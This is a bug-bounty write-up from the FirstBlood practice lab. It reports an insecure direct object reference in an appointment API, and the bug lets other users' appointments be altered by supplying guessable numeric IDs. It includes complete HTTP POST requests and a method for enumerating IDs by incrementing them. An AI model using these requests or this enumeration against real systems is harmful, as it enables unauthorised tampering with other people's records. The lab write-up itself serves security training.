FirstBlood-#76 — Cancel arbitrary reports through 'aptid' parameter
This issue was discovered on FirstBlood v1
On 2021-05-09, ibruteforce Level 4 reported:
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles
Usually, when you book for an appointment at http://firstbloodhackers.com:49234/book-appointment.html and when you're looking to cancel using your appointment at http://firstbloodhackers.com:49234/yourappointments.php, a request is made which is shown below.
As you can see, instead of id parameter, you can actually pass aptid parameter which is used in doctor's panel.
On doctor's panel, http://firstbloodhackers.com:49234/drpanel/index.php, in the dashboard, if you click for appointments dashboard, we can see that it makes a request as follows
Copy the aptid parameter with the value (56919165 in this case) and paste it in the POST request when you're cancelling the appointment. Your post request should now look like this.
POST /api/ma.php HTTP/1.1
Host: firstbloodhackers.com:49234
User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SCH-I535 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Prefer: safe
Content-Type: application/x-www-form-urlencoded
X-SITE-REQ: permitted
csrf: 99215d4e-0ff3-4275
Content-Length: 50
Origin: http://firstbloodhackers.com:49234
DNT: 1
Connection: close
Referer: http://firstbloodhackers.com:49234/manageappointment.php?success&aptid=d67e9093-ab7e-457d-a836-272d11a2d984
act=cancel&aptid=56919165
You should now get a success message indicating that it has now successfully been cancelled. 
To move to the next appointment, all you've to do is increment 56919165 by 600 which is56919765.
Edit: After further investigation, it was noted even though the response gave success, it wasn't actually cancelling the reports, However, I've found that you can still change the message or manage the appointment on the /api/ma.php endpoint.
So now, your request should look like which shows that you change the message of the appointment using an ID.
POST /api/ma.php HTTP/1.1
Host: firstbloodhackers.com:49387
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Prefer: safe
Content-Type: application/x-www-form-urlencoded
X-SITE-REQ: permitted
csrf: 99215d4e-0ff3-4275
Content-Length: 39
Origin: http://firstbloodhackers.com:49387
DNT: 1
Connection: close
Referer: http://firstbloodhackers.com:49387/manageappointment.php?success&aptid=ebe93362-cd25-4f71-8135-4c944c73ba46
message=testzzzz&id=56910219
To move to the next appointment, all you've to do is increment 56919165 by 600 which is56919765.
P2 High
Endpoint: /api/ma.php
Parameter: aptid
Payload: NA
FirstBlood ID: 6
Vulnerability Type: Insecure direct object reference
The endpoint MA.php (to modify an appointment) will allow for integer values to be used when modifying appointments. A bad cause of security through obscurity was attempted.